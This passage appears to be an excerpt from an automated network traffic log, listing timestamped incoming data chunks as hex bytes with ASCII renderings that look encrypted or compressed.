70 5d 5b a9 16 e8 ad c9 dd 01 3f a4 55 e6 7c dd 57 d9 77 ad 2f 54 6c 56 d3 79 1b 46 38 02 f2 30 fe c1 3b 83 02 e9 64 d5 00 60 c8 01 49 6c 42 95 f8 86 bc 43 8f db 05 Data Ascii: 4]j{"U%\|&L\21F{O-A(lh<;f1l_2a!)`[taV9QuT^u)A^mBVn%IaYvjIxvVgH&4+5:$ srKNN,Oj:&]5e\|=*fhq<up][?U\|Ww/TlVyF80;d`IlBC
2021-12-01 18:10:27 UTC	84	IN	Data Raw: 41 7b a3 5d 9c 1a f9 66 35 4a 7b 07 32 cc 0f b3 cd 5c 59 38 2b 5f 4d 98 9b 76 b7 13 a3 f8 12 86 3b 7e 2a c3 66 b5 77 9d fe 5a 7b 24 80 a3 dc d1 30 8e 0c b2 83 5d e7 f6 94 35 ba cf c8 91 e4 09 8b 5e 94 5d 43 a5 6d 2f ec 5a 87 f1 50 08 de b6 2e 85 ba 6c 4e 6f c2 0d d0 92 a6 07 d9 e6 f9 90 0c 1e 8e 57 ec 44 fa 5b 88 42 c3 f7 85 b0 e2 13 a2 e2 a3 12 93 c7 97 ae 80 13 0b 2b 4e a1 a4 7f fe 59 85 5d b5 ad a0 d1 ea 83 53 8a 3e 76 4f af bb b9 87 81 c0 8c 1c 1e d1 4d 22 62 80 54 98 4d 7f 75 81 d8 f5 64 f9 64 f0 70 0f cf bd 73 2e ef 8b 80 36 22 10 f7 ae 3c 80 ac 7c 1c af b4 f4 83 b7 80 09 89 bf 22 9d de bd 9b 05 50 fb f9 b7 33 29 f4 74 8f 8e d3 75 23 b6 e2 36 bf 6a c4 52 48 c1 95 66 1f ce 5b 3b f9 bc 62 a0 b3 5f 69 c7 63 be 74 f1 b1 7a b4 89 ab 31 48 b3 fc 7c 68 2b Data Ascii: A{]f5J{2\Y8+_Mv;~*fwZ{$0]5^]Cm/ZP.lNoWD[B+NY]S>vOM"bTMuddps.6"<\|"P3)tu#6jRHf[;b_ictz1H\|h+
2021-12-01 18:10:27 UTC	86	IN	Data Raw: 5c 47 5c de 37 c9 f8 95 45 c6 db 48 e0 dd d0 b8 32 68 a7 76 45 a9 0d 2c 46 20 87 9c d6 5a 04 17 89 d2 94 ae 2c 04 01 10 17 9a f3 05 e6 3b cb 18 16 ad ca c5 ef 08 6c 6a d8 d6 8b 1e 06 c8 27 29 af 13 38 87 46 3c cb 7b 12 ad 09 9c 47 ad ca 07 73 0d 0b 78 3c 19 bc a5 52 67 25 76 e1 24 9d 83 88 5c 38 2d 02 49 09 e1 7e 2f 80 f7 e0 74 4f 2e 89 fd 2b 36 64 58 43 f5 35 ed 19 2d dc 8b 66 7b 7b 99 38 61 78 15 7e 87 b7 b1 0d 1f 28 21 0f 7e 66 3f f0 72 9f ab 12 75 ec 9f ac e2 8e 00 2b 73 17 75 50 fd e7 fe 8c 92 23 2d 2d 7f ed 48 bf 49 47 b7 69 0e 7d 5f 0a 8a a2 44 cf 38 a3 9d 60 d8 7e d3 92 c4 e7 fe 53 72 8c f1 b6 8a 42 40 31 4b bc 2c cd 11 67 04 36 18 a0 35 38 0c d0 0b 42 19 b1 d3 9e 17 a0 94 50 58 58 b3 51 2f 14 3c b0 95 e9 cd d0 2f d8 4d 16 a1 c0 2b be dc b4 9d 8c Data Ascii: \G\7EH2hvE,F Z,;lj')8F<{Gsx<Rg%v$\8-I~/tO.+6dXC5-f{{8ax~(!~f?ru+suP#--HIGi}_D8`~SrB@1K,g658BPXXQ/</M+
2021-12-01 18:10:27 UTC	87	IN	Data Raw: 05 95 28 f1 2a 83 3d 77 2f 0f a0 fd da 01 a1 7e 46 73 df d4 bd 07 f1 a3 3f 8c 78 20 1e 4e e5 7f bd fd 20 d3 ed c5 a6 1d 50 29 0e 7c b1 16 e6 b2 1f 69 ae 9e b2 7e 85 19 2e c2 a4 0d df c1 cd b7 8b f7 da 64 06 b1 bc 00 ef e6 cc b2 f4 5d 34 f8 52 62 1b d7 77 44 72 6e d1 b5 fe 65 c0 8f 23 90 32 03 19 50 92 82 51 f3 00 ac ee f4 e8 93 73 28 be dc 8a 75 99 7a 93 31 3b 93 a6 f4 87 3d 91 2b c0 62 71 f8 f5 e3 eb b7 cd b7 29 db 0b 8f 78 af 19 3a 6e 67 07 a9 d6 30 f6 44 4a 1e 7f 2e 85 a1 36 dc 60 c2 1d dd f6 63 f9 d8 ce 7f 21 83 f6 84 48 e2 5f dd 68 98 4d d6 c1 21 b1 ce 38 bc 25 27 31 82 ce 03 99 c6 7b d1 4d 19 82 a4 7f e5 24 4e 5d f5 f2 a3 53 e8 8b 71 69 a1 69 5a ab 62 34 bc 8e db 70 60 f9 df 4f 5d bd 88 7c c6 74 1b 80 6d 36 fa 71 ce f5 e4 7f 10 ee 40 01 3d e7 9a 83 Data Ascii: (*=w/~Fs?x N P)\|i~.d]4RbwDrne#2PQs(uz1;=+bq)x:ng0DJ.6`c!H_hM!8%'1{M$N]SqiiZb4p`O]\|tm6q@=
2021-12-01 18:10:27 UTC	88	IN	Data Raw: 96 85 5b ba d7 09 28 7d 7d 60 cb d5 d4 81 c0 fd 31 f7 98 bd 75 b6 1a 1b ee 76 c5 3f 15 6f 26 c2 bd 27 5b b7 83 88 40 a3 b4 b3 b8 8d f6 2c 8e 05 86 15 b9 de 41 34 37 eb d1 d9 30 cd 6b 28 96 50 e5 e0 a5 0a 8b d0 af 02 0a 40 e7 96 6f 47 65 42 f9 72 da f7 80 48 43 1c 64 f3 db d1 4f 62 eb a6 7c 52 2d 41 6c 44 21 9e bc 8b 48 17 12 98 c7 e8 f2 24 fa 0a 14 5f 8e f4 1c c3 6c cd 07 17 af c0 d4 f3 88 5a 5b 26 d5 dc 83 04 b3 ea 9e c0 02 31 96 48 48 7c ff 12 ad 0b b6 2d 67 ca 0d 75 7f dc 7e ea 92 90 d6 6d 67 5e ac f0 21 ea d2 87 74 75 04 40 41 0b 90 b1 39 16 80 a7 05 70 26 a1 b5 38 3e 1d 30 05 f7 3f cf 52 38 4a 36 18 6a 09 da 30 1c a1 3d 3c 81 a8 89 36 54 2a 30 0a 70 72 d0 fc d1 8f a9 14 fb d1 52 ac e3 9b bf 42 ea 50 75 5a 5e e4 01 8e e9 e2 05 1e 7a e4 53 ae 13 f7 9d Data Ascii: [(}}`1uv?o&'[@,A470k(P@oGeBrHCdOb\|R-AlD!H$_lZ[&1HH\|-gu~mg^!tu@A9p&8>0?R8J6j0=<6T*0prRBPuZ^zS
2021-12-01 18:10:27 UTC	90	IN	Data Raw: 04 6a 85 bc b0 84 81 95 c7 89 93 0f c2 9e fe 05 b0 f6 50 27 99 62 6b 7c c3 60 d3 13 40 6b c0 41 30 af 44 0a 34 5f ba 81 f8 a5 51 29 05 ce 22 7a c1 92 db 30 3c 16 35 18 a1 d7 e0 37 b7 99 b6 d8 c6 5b 76 7d 9e 48 25 84 df df a0 97 a2 27 1e 6c f3 20 9f b8 52 b9 b8 ce fe f3 f0 aa 03 9a 5f dd fb e7 3e e0 d7 f3 9d 77 32 94 ce c9 7c ab ff 2b c4 2a 47 ac 50 ae 29 0a 35 98 13 d4 5e cd 96 51 af cf b2 85 02 1a c7 df b0 d8 c1 c9 10 8f f1 da 62 e7 5f 20 00 eb ef ea 32 ef 47 a2 af 50 73 1f c4 7c 09 00 92 2e 40 e5 0d c8 06 21 90 3c 2c d4 79 92 88 7b cc d7 ac e4 e8 90 7d a8 2a c3 68 b5 77 9d 1e 35 cd 56 15 ad dc c6 15 82 11 4e 82 5b f8 f4 ef fb ba cf dd f4 d0 20 90 54 ed 0c bf a4 4b 05 b5 53 87 fc 50 b6 64 98 2c 92 ae 42 5a 78 3c 1d f3 8f 83 fb f3 29 f3 ed c4 c9 84 4c 6d Data Ascii: jP'bk\|`@kA0D4_Q)"z0<57[v}H%'l R_>w2\|+GP)5^Qb_ 2GPs\|.@!<,y{}hw5VN[ TKSPd,BZx<)Lm
2021-12-01 18:10:27 UTC	91	IN	Data Raw: f6 6f 8f 6f 69 f5 9e 08 33 2f 0c e0 10 50 8e 30 31 ad 15 05 3d 1d 7b 2e 1d 46 ab 21 e4 3f 98 95 70 02 7a 99 d2 52 2d 50 95 ea 91 41 29 ff ad 56 af 16 89 2a a8 37 32 23 77 ac 0e f6 1e d8 27 98 1d 84 7a 52 bd 1c 59 6a 9f c0 c8 25 f8 94 84 51 ab c1 0c 37 e6 7c f6 ca d7 a9 5f c9 ec 3e 68 26 ac 74 b0 06 af c5 48 d6 2b 04 6a 7d 0a bc 27 5f d7 af 98 53 81 3b d8 cb cb e7 25 f7 0f c5 17 bf c7 5f 65 32 fb dd b6 1a b4 a0 2e 80 47 e9 e7 b2 d1 8a 4d b8 d8 1b 2e 24 98 44 57 65 42 c0 39 49 e1 a4 58 29 df 73 25 cc d3 2d 53 fe 70 65 4d 34 3c 3d 53 10 72 85 c4 3e 96 18 89 c2 8a b4 31 20 17 ea 90 a7 f4 16 ea 00 84 05 1d b4 b1 d7 fe 07 68 48 2b c6 af 66 43 b2 ee 23 be 1a 5f 84 43 ea 4e 3f 36 af 0b b2 40 bf cf 19 62 70 db 69 3b 93 0d c1 b7 76 33 6f ff 0a c7 d2 8d 4d 3d 94 56 Data Ascii: ooi3/P01={.F!?pzR-PA)V*72#w'zRYj%Q7\|_>h&tH+j}'_S;%_e2.GM.$DWeB9IX)s%-SpeM4<=Sr>1 hH+fC#_CN?6@bpi;v3oM=V
2021-12-01 18:10:27 UTC	92	IN	Data Raw: 14 50 d5 df 85 13 f8 66 65 b5 92 18 3b ac 43 29 d8 4b 38 de e0 61 6e c2 29 a9 07 e0 98 2c dd 2d 33 c1 69 ce 62 c4 24 d0 71 7e 26 7c e0 51 e3 68 1e 42 b1 3e f6 21 fa c6 16 fc b4 fb 6d fa be 09 c8 01 5e 7a 50 86 87 56 42 40 80 df b8 13 42 57 ab bb 93 9b 87 5d 6e 82 04 d4 a1 79 15 bb d4 80 71 9b 68 70 0d c5 f5 d5 18 51 62 c4 eb 1d be 85 0b 3e 4c 7f a9 e9 b4 47 30 ad f0 81 7f 5b 86 f3 ec 32 09 21 f1 2d fc eb 26 b3 b0 07 c9 cc 4d 41 a0 89 42 23 37 c4 ca a3 7d b7 23 b2 7d fb 3b 80 ba da 86 e9 ce e8 db 1e b3 10 9a 73 ce da bb c2 e3 80 39 9e 64 31 fa 5c c3 7c bb e4 32 2d fd e6 b3 41 aa 12 3e 7f 9a 13 c0 39 e6 96 40 be a8 80 84 2e 18 d3 b7 7a c3 d2 c7 01 9a fd d4 68 83 76 90 07 e8 f6 41 3c e4 43 7e bc 45 68 04 de 8a 36 61 60 c0 b9 f6 08 3d 78 13 9c 27 27 48 58 92 Data Ascii: Pfe;C)K8an),-3ib$q~&\|QhB>!m^zPVB@BW]nyqhpQb>LG0[2!-&MAB#7}#};s9d1\\|2-A>9@.zhvA<C~Eh6a`=x''HX
2021-12-01 18:10:27 UTC	93	IN	Data Raw: 26 e0 08 e8 a2 1c 87 af 6a 07 b4 b8 e3 69 bb af 56 8a d6 ef 8f dc ab 93 06 51 3f 75 b4 9f 28 f6 70 b0 05 97 75 23 9f 43 3f b9 e0 91 54 59 c6 bf b6 c6 ce 51 17 c8 c6 be aa a4 d7 40 5d 18 60 5c c2 b4 15 20 a0 f1 37 4a c2 31 7a 40 75 e4 e4 f8 e0 d9 f4 9a 6d 48 27 18 f9 c5 1f a3 09 0a 85 31 0f 2e 1f 6e 1f 0c 6e c6 21 f6 32 98 d4 75 02 7a a2 74 73 2c 57 b3 fc 0f 6d 01 c7 ac 45 a8 e8 ab 0e 80 00 bf 08 7d bf 06 e6 39 c8 2c b0 22 ae af 50 ab 0c 62 d6 8c d3 df 0e ce 87 82 79 93 d2 18 2f 2c 54 71 cc ee 29 4d c0 fd 23 42 8c 74 74 b6 14 37 61 4b 1e 28 cf 7e 52 19 b6 1f 90 c4 bc 8a 42 d2 71 d9 cb c9 e5 27 1e 3e ca 15 c2 08 57 74 3e fb da ce e4 2c b3 24 94 2f 31 f1 a3 d8 28 b4 be 04 19 37 23 be b9 47 74 49 c7 ba df f7 8a 4b 2c ce 70 db 7c d6 3c 57 c1 3a 76 43 2f 23 20 Data Ascii: &jiVQ?u(pu#C?TYQ@]`\ 7J1z@umH'1.nn!2uzts,WmE}9,"Pby/,Tq)M#Btt7aK(~RBq'>Wt>,$/1(7#GtIK,p\|<W:vC/#
2021-12-01 18:10:27 UTC	95	IN	Data Raw: 7e 09 3a 5b 09 8a a2 7b 4f 2b ba 84 01 61 de d3 94 48 de ef 5d 1c ab f5 a9 92 4e 75 5e b1 b2 33 ca fc 6a 39 27 0e e8 88 3a 0c da 12 37 7d ad a7 9e 17 a0 aa 00 56 37 56 47 14 03 ac 25 68 f6 c9 d0 2d c9 51 31 02 fd d5 b9 eb d6 e7 8a 3c 33 f9 e9 85 11 f2 18 55 a1 6c 11 20 a6 78 e8 9f 90 3d de ec 1f 00 4c 52 a3 0b f0 bb 1f f2 2e 39 b4 50 a0 60 ce 54 ff 77 af 37 bb 63 15 d7 6a 1f 5b db 51 f0 30 f5 f1 38 54 12 e4 46 9d 96 60 ce 2c 45 78 5f bf ad 43 bc 45 e4 b4 96 04 60 a2 be b0 93 9b 8d be 21 80 04 df e6 0e 16 bb d4 d5 36 97 7f ac 64 da e1 f1 09 48 5c 81 24 e7 41 4c 27 0e 5d b4 81 32 a1 51 25 c8 a4 31 7e 51 a0 e2 f6 29 1c 27 27 90 d2 e0 31 a0 07 bb c9 cc 4c 4a a7 8e 60 80 26 ce df 9c 92 b6 0f b7 03 9e 28 89 3e 4b a8 b3 e7 cc d8 01 ad 6c fc 71 df da 84 32 e7 bd Data Ascii: ~:[{O+aH]Nu^3j9':7}V7VG%h-Q1<3Ul x=LR.9P`Tw7cj[Q08TF`,Ex_CE`!6dH\$AL']2Q%1~Q)''1LJ`&(>Klq2
2021-12-01 18:10:27 UTC	96	IN	Data Raw: 40 88 85 99 4d d8 eb 00 6a ce 32 af 9c 51 1b 82 c4 2b b1 9e 49 d3 47 2b a1 a4 7f fe 59 85 5d f7 de 9f 40 ea 89 5b 25 dc 88 50 bc b0 ba be 01 da 72 17 1e d4 67 77 a9 80 52 ef 52 19 8a 74 5d ed 61 c4 6c e5 5f ef 13 43 72 33 ee b2 a7 23 f4 05 8d e6 19 93 a9 06 0f a3 d6 39 7d b6 a8 46 8f b9 0b 9d de bd b9 14 54 3e 46 9f 33 6c f6 76 89 02 95 75 23 b5 f0 3a 91 54 83 52 4e c5 95 42 1e ce 5b 3f c1 95 4c a8 a4 d5 25 e1 61 bf 56 b8 be 7e 96 2e f0 31 42 95 e6 52 6e 73 f2 78 f0 26 db f4 94 78 22 32 65 12 1b 57 82 23 38 8b 35 2d 45 17 6d 08 79 a4 a9 21 f2 1e b0 01 71 11 4c 8e db b8 2c 51 95 ea 1c 6a 29 fd 84 52 a2 36 82 29 be 4a 53 08 77 a8 0d f3 64 24 2c b0 a6 84 79 29 4e 0a 4a 7d 8f d7 a4 ce d8 94 81 53 8b d2 58 24 f2 d9 4b cb d7 ae 31 27 fd 35 44 f5 db 07 b4 10 b3 Data Ascii: @Mj2Q+IG+Y]@[%PrgwRRt]al_Cr3#9}FT>F3lvu#:TRNB[?L%aV~.1BRnsx&x"2eW#85-Emy!qL,Qj)R6)JSwd$,y)NJ}SX$K1'5D
2021-12-01 18:10:27 UTC	97	IN	Data Raw: 58 0c eb 66 3c 0f 7a a1 5a 44 27 a3 cc 9d 37 6e 76 0c ed 26 e2 10 2b 4f 23 00 90 7b b5 38 15 c4 68 7c 83 a2 9c 14 03 2d 30 11 64 60 3f f0 72 a5 b1 07 fc aa 8e a9 fb 61 09 01 f4 53 76 23 48 ce 55 8a 98 30 16 1b 7e fc 47 b5 3b 79 9b 60 07 3a 11 09 8a a2 72 86 3d a3 86 0a 45 81 d2 b8 5e de db ad 74 29 f6 a9 9e 22 34 33 5a b9 40 bc ed 66 22 27 06 c0 0f 3a 1d df 0e d8 72 ee 99 9a 10 d7 57 11 5a 5c a2 54 11 09 d2 4a 71 08 c2 ef 2a df 5a 64 55 ff d5 bb ec aa 89 88 2d 3c c3 21 82 2c ff 60 72 a6 6c 0a 34 b5 65 c0 f1 b4 3e f5 e3 48 45 b1 ad 56 2d ff b2 2c ec 2f 39 89 3f cc 62 03 5e d9 77 b0 3a be 67 79 e5 1c 88 51 b4 3c e1 34 ed d3 3b 3c 02 e9 64 fd 92 6a e4 06 5e 1d c3 97 83 41 96 40 a3 a6 96 04 60 92 35 b0 4b 84 a6 f9 22 82 04 df 84 4a 2c bb de f9 f9 99 6f 50 77 Data Ascii: Xf<zZD'7nv&+O#{8h\|-0d`?raSv#HU0~G;y`:r=E^t)"43Z@f"':rWZ\TJq*ZdU-<!,`rl4e>HEV-,/9?b^w:gyQ<4;<dj^A@`5K"J,oPw
2021-12-01 18:10:27 UTC	98	IN	Data Raw: a8 74 b6 c0 b9 d6 4d d2 33 2d f3 5d 0a bd 27 57 d9 42 8b 6c a0 aa db b6 c3 f5 2c 80 33 cb 17 b1 ce a9 75 16 e7 d6 a7 a1 b6 a0 22 eb 5b ed f1 a7 c7 08 fa a7 19 f6 3a 1b 92 44 99 68 43 d1 3f c4 09 8b 66 31 dd 67 8e d0 d7 3c 59 f4 aa 76 4b 3b cc 2d 6a 2b 93 8c b4 58 16 18 8d dc 92 bd 26 f2 17 c2 1c a0 f6 0e e7 28 c7 1e e3 bf e9 cf fd 2f fc 5a 26 dd 8b 80 1e bf ee 21 b7 e9 31 ba 4a 99 ff 51 12 ab 00 ad 5a ac c2 12 78 88 cc 54 36 1a be ab 7e 64 25 78 ef 2b e2 c3 82 4a cc 04 6c 49 1e e7 77 31 09 8e 5e 77 63 26 8a ba 11 6b 91 8f f8 f0 1f f4 20 39 4a 9d 09 6e 7a 48 32 1c ba 03 6d 87 90 11 1e 10 28 30 11 65 6f 3f f0 72 a1 aa 03 ca 8f 86 bf e7 9f 19 29 e6 af 74 7c f9 d8 5f 96 81 2d 05 0f 7a f7 bc a9 e9 7d 9c 42 14 46 68 0b 9b ac 77 6b 39 8f 92 16 53 63 c0 90 48 c9 Data Ascii: tM3-]'WBl,3u"[:DhC?f1g<YvK;-j+X&(/Z&!1JQZxT6~d%x+JlIw1^wc&k 9JnzH2m(0eo?r)t\|_-z}BFhwk9ScH
2021-12-01 18:10:27 UTC	99	IN	Data Raw: 22 99 79 7f 68 d8 0e fe 34 59 6a c0 0d 14 a1 49 19 3b 4c ae ac f0 5b 50 0f b7 ca 48 70 5a 86 f7 92 be 14 33 05 94 da fa 24 b3 8a ad cc d3 59 a0 b2 b6 47 21 5d c0 d4 b4 87 d9 f8 bd 6c f9 35 9c 27 68 b9 a9 ca f7 ce ff aa 2f 9f 71 a4 de a3 3c e6 c3 95 9d 77 3c ff 59 da 79 aa ff 2a cc ed 34 b8 7c be 2a 25 10 1f 15 b0 af 83 45 50 b4 b4 61 97 11 1b c5 b5 79 c7 cb 33 00 a7 e1 c9 64 06 7b bd 00 ef ed 27 a9 e9 50 7e d3 85 63 1b d3 6b 3c 5e 69 d1 ae e2 15 4d ce 0d 95 2e 20 40 41 97 88 68 b2 1d ba 1a ed ab 1c 70 3c c5 a1 b4 77 9d 6f fa 64 3c 93 bd d9 dc c1 90 0d 51 80 0a f6 f5 ef f9 b8 b4 dc e3 db 0f 9d 56 91 0b 40 a5 63 89 1a 37 2e fb 46 42 78 a7 2b 85 b4 47 45 9e c3 30 d0 8f d3 eb d9 ca f5 81 34 43 7a b7 1c 4e e6 5e 99 5c d9 ff 85 b0 e2 31 bc e0 af 1b 93 cb 1e a6 Data Ascii: "yh4YjI;L[PHpZ3$YG!]l5'h/q<w<Yy4\|%EPay3d{'P~ck<^iM. @Ahp<wod<QV@c7.FBx+GE04CzN^\1
2021-12-01 18:10:27 UTC	100	IN	Data Raw: df 36 10 7b 64 34 93 ad 4e 01 34 b0 0b 72 79 65 8b db 76 32 62 93 e3 73 c0 29 ff a6 52 88 36 93 1b ab 37 90 08 77 ac d4 e5 19 d8 5f 3c a2 86 70 58 a9 09 42 16 46 d2 d9 2e f4 98 81 59 c4 a7 18 25 f8 05 77 c0 09 be 48 d4 ac 23 4b 29 a2 7c 9a 16 b1 b9 0b c4 3f 1f b1 5a 20 bd 26 4f c4 bc 88 40 af ad c4 e8 cd fe 2c 84 2d c7 0c 89 d1 57 73 3b ea d1 05 32 b6 b1 2a c6 2f e2 f0 a3 d8 71 c6 af 02 09 16 3c be 41 41 74 49 a2 b4 da f7 80 30 3a 8a 0b 3a de d6 3a 57 c1 35 74 43 2f 3f 04 d5 23 94 9e c5 43 69 8b 89 c3 91 99 e6 fb 00 3a 0e 88 f2 79 7f 2a cf 0d 0e b8 ee f8 ec 01 5b ce 24 d7 ad 5d 01 b0 ff 2c c0 81 32 96 48 c7 6e 52 42 bc 0e bc 39 66 cb 0d 77 5a d3 69 38 0c bf ad 74 64 25 78 f8 30 eb b8 90 5d 32 01 51 4e 72 cf 76 39 12 eb 64 77 4f 22 87 ad 2f 1e f9 72 07 fd Data Ascii: 6{d4N4ryev2bs)R67w_<pXBF.Y%wH#K)\|?Z &O@,-Ws;2/q<AAtI0:::W5tC/?#Ci:y[$],2HnRB9fwZi8td%x0]2QNrv9dwO"/r
2021-12-01 18:10:27 UTC	102	IN	Data Raw: dd e6 70 6a 5f 54 b6 0d 1f b1 1b d3 2e 42 97 3e cc 66 f7 f4 db 66 a4 2e a1 7e 7c e3 79 19 4e a4 c3 f3 1c dd d5 68 7c 02 e9 6a ee 95 1b e9 00 58 6d 3b 42 82 40 ba 6b 11 da 94 0e 7c 9e c0 12 95 8a 89 ce 04 91 02 d5 98 64 0c 45 df df 29 9a 13 5f 76 d4 f4 c6 58 50 62 d7 c2 0b b8 44 1b 38 53 aa 57 e8 89 4b 21 dc c6 32 7e 5f 8f 7d 4a 8e 3e aa 0d 2c da f6 2f d9 23 bc c9 c6 52 48 a0 9c 48 32 20 d1 de 4a 82 9a 04 9d 6c fb 2a 89 27 69 a6 b4 dc ee db 10 ad 1c 8e 8d de fc b6 3e 99 a2 3e 9d 73 30 f6 49 47 cb c5 47 2f d3 f6 d5 a6 43 a8 28 33 78 84 ed df 06 e0 94 52 db 65 7f 85 04 13 da ad 6f de c1 dc 07 94 ed 35 67 51 6c be 7b e5 e4 48 27 cb 50 f5 bc 54 4a 82 d7 74 3d 5b 74 be 16 e7 0f b9 d0 3a 83 3e 2b 4a 54 8d 84 87 b6 2e a5 dc c2 85 17 72 37 b5 bc b3 77 88 76 f0 89 Data Ascii: pj_T.B>ff.~\|yNh\|jXm;B@k\|dE)_vXPbD8SWK!2~_}J>,/#RHH2 Jl*'i>>s0IGG/C(3xReo5gQl{H'PTJt=[t:>+JT.r7wv
2021-12-01 18:10:27 UTC	103	IN	Data Raw: eb 97 c1 a0 80 10 54 3c 72 82 cd 28 da 61 8b 79 9b 74 23 b3 e5 16 23 e4 82 58 5e da d2 64 1f ce 5b 0c c3 ae 66 aa b5 d7 4b 39 62 93 4b c0 cb 74 bf a1 f5 2e 65 91 74 78 40 7b e4 66 ec a9 d9 f4 94 1c 33 21 18 e2 1f 48 8b df 3c a9 26 07 46 19 6c 0e 00 42 81 ba f4 34 ba 17 6f 6d d5 8a db 78 33 5f 86 ee 1c 7b 2d e0 bb bb a3 1a b3 29 d3 39 be 08 73 b2 82 ce 19 c9 2d bd ab 90 65 04 37 03 5d 66 c6 4f d0 30 c3 08 8c 48 b7 4e 11 3f e4 c8 69 d0 c1 33 45 dc eb a9 49 ea be e8 bf 06 a7 b9 f5 c4 3f 1f 72 45 19 b9 27 4e c0 a3 83 be a8 81 ce c9 b6 fa 2d 84 29 d1 3f 23 d6 57 7e 2c f0 be 70 32 b6 aa 37 9c 47 e8 f1 b2 d8 1b ee 51 03 24 32 0f 11 6f 43 74 50 c4 24 dc f7 9b 4e 20 24 65 df d0 d4 47 53 e8 a6 72 2c b9 30 2c 4c 2b 8d 87 cd 4a 06 1c 96 d9 65 b0 0a ee 02 47 13 8d f4 Data Ascii: T<r(ayt##X^d[fK9bKt.etx@{f3!H<&FlB4omx3_{-)9s-e7]fO0HN?i3EI?rE'N-)?#W~,p27GQ$2oCtP$N $eGSr,0,L+JeG
2021-12-01 18:10:27 UTC	104	IN	Data Raw: fe 42 7b 87 09 a8 b4 5f 6f 31 1a b3 33 4d c4 66 28 2a 11 ca 19 32 0c cb 1c 38 8d c3 bf 9a 3c ef a3 18 49 50 b9 56 1c 16 de b1 6b da cc c7 4f 5a 5e 19 b4 c6 18 bf f0 b9 93 96 2f 31 d5 ce 8b 1f e2 89 60 8f 7b 18 61 d1 73 3f f0 9c 3f 8e 9d 6b 6b 4e 56 97 aa e1 b0 37 c3 32 2a ba 3f dd 6a d1 54 27 67 88 3d a9 3d 6f 9e 48 1e 51 b0 22 f9 23 f7 d7 02 7a 1c e0 90 ed ba 72 ca 7a 56 68 54 93 94 57 cf d2 89 d8 9e 08 75 8e bc b3 95 9b 8b ce 07 7c 05 f9 83 73 12 ac 09 e0 21 86 7b 69 7f d4 e1 f7 0f af 63 fb d8 00 ad 4c 0a 2f 44 a0 a6 17 a4 7d 2e b1 cf 24 a4 e3 95 f4 ee 3e 09 23 1c 24 d0 f1 3f a9 96 42 c8 e0 41 5c c8 91 49 23 22 e3 e1 ab 9e a5 07 bd 7d fb 36 77 35 41 b4 bb 9f 93 c2 00 ab 07 86 40 4c cd b1 34 e2 bd 37 8b 89 37 cc 4c de 6f a2 ee 3e db e3 ee 47 51 82 2a 09 Data Ascii: B{_o13Mf(28<IPVkOZ^/1`{as??kkNV72?jT'g==oHQ"#zrzVhTWu\|s!{icL/D}.$>#$?BA\I#"}6w5A@L477Lo>GQ*
2021-12-01 18:10:27 UTC	106	IN	Data Raw: af 78 d1 43 72 bb b7 77 fe 48 8d 42 ed 08 89 6c f3 86 5a 3b be 7d 86 94 8f b8 96 84 f3 da 1f 32 d5 32 7a aa 80 50 83 6d 08 82 7e 36 e1 6d 08 65 cd 77 28 88 42 72 02 fe 89 81 21 e5 0b e9 4f 19 bf a0 64 1e a8 ab f7 75 a9 bd ba 8a e8 ff 98 dd b1 8c 08 82 05 4d 9d 33 23 8b 6b 88 02 91 6a 31 a4 fb 3e a8 ee 9d 41 b6 c1 91 c2 1c c6 4f c5 e2 36 60 aa ae c0 50 d8 77 ac 54 c2 a1 72 a1 ab 0f 30 64 b5 fc 7e 57 31 74 7e 83 00 c6 ff 8d 0a 20 34 10 ed e5 56 aa 2e 3e 8d 2f d3 15 9c 6f 0e 0e 55 ad 3e ff 27 b8 01 60 0a 63 83 25 73 00 5e 96 e2 03 60 ff d7 27 47 a2 3c 85 34 a2 24 b7 08 66 a4 10 eb e7 c8 00 a1 a7 fd 66 55 ab 0e 5f 17 cd ce d8 28 d8 8b 8a 42 a3 d2 09 2d e9 aa 61 e7 dc ac 44 e8 76 37 40 fd a3 68 a5 18 b9 c7 54 db 32 eb 6c 71 1e b8 24 57 db b0 5c 68 92 ac d9 c1 Data Ascii: xCrwHBlZ;}22zPm~6mew(Br!OduM3#kj1>AO6`PwTr0d~W1t~ 4V.>/oU>'`c%s^`'G<4$ffU_(B-aDv7@hT2lq$W\h
2021-12-01 18:10:27 UTC	107	IN	Data Raw: 13 e0 7f 95 48 3c 03 7d 72 9e 5d b3 a9 15 74 90 ac 84 71 bf 2a 30 0a 6c 66 c4 e0 58 2a 51 14 f9 ab b7 9f e2 9f 02 2f 84 5f 74 50 f8 a0 c9 8e 92 23 89 8f 7e ed 43 be ed e4 b6 69 05 79 68 1d 80 76 1f 97 29 ab ea 1e 58 7f d7 96 59 dc e9 39 a9 28 e0 7f 15 7a 4f 31 5b ce 23 c1 ef 62 2a 50 15 d2 0a 3e 05 cc 7b b6 71 c2 99 ba 15 d1 b2 10 5a 5c bb 3c 04 08 c3 4b 7c e7 c7 74 4f 83 5c 19 b4 d9 d7 c4 fe b8 8c 8c 35 2f ba 4f 81 00 f6 51 76 a9 b2 39 33 d1 61 3f f0 9c 53 58 e4 70 60 58 38 94 6f 1f 4f c8 02 21 11 85 3f cc 68 e6 66 d9 66 ae ef aa 7b 50 e5 42 5e 4d b4 3d f2 30 ff d7 01 72 03 e9 d8 ed 96 60 00 00 58 69 58 97 83 40 a6 43 8b d9 87 34 68 84 87 bb 95 8a 8b d1 15 93 12 de a2 79 14 bc c9 0d 26 b5 6a 62 7c d4 f7 e9 e6 50 4e d5 cc 13 be 43 12 c0 4d 93 ab c2 a7 7a Data Ascii: H<}r]tq0lfXQ/_tP#~Ciyhv)XY9(zO1[#b*P>{qZ\<K\|tO\5/OQv93a?SXp`X8oO!?hff{PB^M=0r`XiX@C4hy&jb\|PNCMz
2021-12-01 18:10:27 UTC	108	IN	Data Raw: 39 93 ad cf c4 2e 95 37 5b 0e 5e f8 f4 ee 5f ab cb d8 f6 cd 1c a3 fc ea 1b 4b a2 73 2f 41 5c 87 fd 50 c5 62 b4 2e 84 b1 56 49 77 ea bb df 8d a2 df f3 90 f6 82 27 24 80 48 e5 41 78 5c 99 4d dd fd 6f a5 e6 91 ab f3 a0 0f aa 20 05 b1 8b 6f 5c 40 6d a1 a5 6b ea 4d ad fe f5 f6 82 68 fb 83 59 39 ad 61 44 94 5b bd 96 88 cc ff 1a 32 df 4e 4a af 91 50 8a 5c eb 8e 7e 21 4b 66 f2 70 f5 6b 38 4f 43 72 08 cd 2b 89 21 fe 2f fc 9a 20 94 b7 54 e0 a4 ab e0 6b 3b ab 44 8b c5 ff 89 ca 91 30 14 54 27 62 b4 c2 2d f6 70 9f 8f 92 75 23 b6 e7 2a ad ce 21 52 48 ca 95 7d 1f ce 5b 